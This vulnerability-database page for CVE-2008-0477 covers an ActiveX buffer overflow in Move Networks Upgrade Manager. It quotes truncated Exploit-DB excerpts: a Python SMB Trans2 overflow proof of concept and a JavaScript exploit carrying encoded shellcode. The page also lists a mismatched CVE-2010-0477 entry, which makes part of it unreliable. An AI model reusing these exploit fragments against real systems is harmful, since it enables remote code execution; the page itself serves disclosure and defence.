CVE-2008-0477
published 2008-01-29CVE-2008-0477: Stack-based buffer overflow in the QMPUpgrade.Upgrade.1 ActiveX control in QMPUpgrade.dll 1.0.0.1 in Move Networks Upgrade Manager allows remote attackers to…
PriorityP350critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
14.76%
96.3th percentile
Stack-based buffer overflow in the QMPUpgrade.Upgrade.1 ActiveX control in QMPUpgrade.dll 1.0.0.1 in Move Networks Upgrade Manager allows remote attackers to execute arbitrary code via a long first argument to the Upgrade method. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| move_networks_inc | move_media_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
exploitdb·2010-04-17·CVSS 9.0
CVE-2010-0477 [CRITICAL] Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
---
import sys,SocketServer
# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270
# Full advisory: http://seclists.org/fulldisclosure/2010/Apr/201
# More information: http://g-laurent.blogspot.com/2010/04/ms10-020.html
#
# Note from Exploit-DB: It has been reported to us that CVE-2010-0020 also applies
#
EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"
packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xf
Exploit-DB
Move Networks Upgrade Manager Control - Remote Buffer Overflow
exploitdb·2008-01-24
CVE-2008-0477 Move Networks Upgrade Manager Control - Remote Buffer Overflow
Move Networks Upgrade Manager Control - Remote Buffer Overflow
---
Move Networks Upgrade Manager Control Buffer Overflow Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3
http://secunia.com/advisories/28647http://www.securityfocus.com/bid/27438http://www.securitytracker.com/id?1019270http://www.vupen.com/english/advisories/2008/0274https://exchange.xforce.ibmcloud.com/vulnerabilities/39913https://www.exploit-db.com/exploits/4979http://secunia.com/advisories/28647http://www.securityfocus.com/bid/27438http://www.securitytracker.com/id?1019270http://www.vupen.com/english/advisories/2008/0274https://exchange.xforce.ibmcloud.com/vulnerabilities/39913https://www.exploit-db.com/exploits/4979
2008-01-29
Published